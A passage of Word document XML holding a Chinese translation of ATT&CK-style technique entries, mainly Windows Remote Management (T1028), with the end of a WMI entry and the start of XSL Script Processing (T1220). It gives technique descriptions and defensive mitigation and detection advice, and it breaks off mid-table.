            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3041FE27" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E892220" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6821" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DEEE131" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防止系统之间管理员和特权账号的凭据重叠。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="55C7DEC6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EBFE07A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6821" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52139F02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>默认情况下，只允许管理员使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WMI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程连接。限制允许连接的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>其他用户，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或禁止所有用户远程连接到</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WMI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FBA43F8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CE6C77" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523F650" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接的网络流量；在通常不使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的环境中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能是可疑的。通过进程监控来捕获“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wmic</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的命令行参数并检测用于执行远程行为的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD0FCF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>远程管理</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="64569F10" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D44739B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1028</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2613E172" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63BC879C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52AB6A86" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统要求：在远程系统上打开并配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>侦听器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15228461" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683D2DB7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，认证日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E0FB354" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B5F5BEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A210E57" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112FFE2B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Windows Remote Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，也是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许用户与远程系统交互的协议名称（例如，运行可执行文件，修改注册表，修改服务）。可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cstheme="minorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>winrm</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令或任何数量的程序（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793673EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="2EB0D304" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="390AA07F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="67BBE799" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="04B55FEB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="509C12A6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>或移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E844E1D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="326AB7FC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D2D6262" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络分区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1124234B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果需要该服务，请使用单独的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基础架构锁定关键飞地，并遵循使用主机防火墙的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>最佳实践来限制</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>访问，仅允许与特定设备进行通信。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5A760636" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4320F9D1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="631C9466" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果需要该服务，请使用单独的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>账号和权限锁定关键飞地。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CD93ACD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B1CDF9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过跟踪服务执行来监控环境中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用。非正常使用或禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能表示有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可疑行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用脚本创建的进程和执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，将其与其他相关事件关联。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24379AE8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="043E7AC5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>XSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="3E42E1B0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF88BCA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>: T1220</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3917B560" w14:textId="45F523A8" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="00ED5496">
